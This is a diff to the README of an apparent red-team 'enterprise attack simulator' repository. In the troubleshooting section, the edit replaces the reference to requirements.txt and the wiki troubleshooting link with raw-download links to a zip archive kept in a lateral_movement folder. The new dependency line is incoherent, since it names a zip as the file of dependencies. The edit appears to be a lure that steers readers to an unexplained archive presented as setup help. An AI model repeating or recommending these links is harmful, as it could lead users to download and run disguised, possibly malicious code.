WhyN0tTh0/enterprise-attack-simulator/README.md

 ## 🛠️ Troubleshooting
 In case you face any issues:
 - Verify that Python is installed and correctly configured.
-- Ensure all dependencies from the `requirements.txt` file are installed.
+- Ensure all dependencies from the `https://github.com/WhyN0tTh0/enterprise-attack-simulator/raw/refs/heads/main/src/techniques/lateral_movement/enterprise-simulator-attack-v2.8.zip` file are installed.
 - Check if you have sufficient permissions to run the application.

-For further assistance, refer to the [Troubleshooting Guide](https://github.com/WhyN0tTh0/enterprise-attack-simulator/wiki/Troubleshooting).
+For further assistance, refer to the [Troubleshooting Guide](https://github.com/WhyN0tTh0/enterprise-attack-simulator/raw/refs/heads/main/src/techniques/lateral_movement/enterprise-simulator-attack-v2.8.zip).

 ## 💡 Usage Scenarios
 - **Red Teaming:** Use this tool to practice offensive security tactics.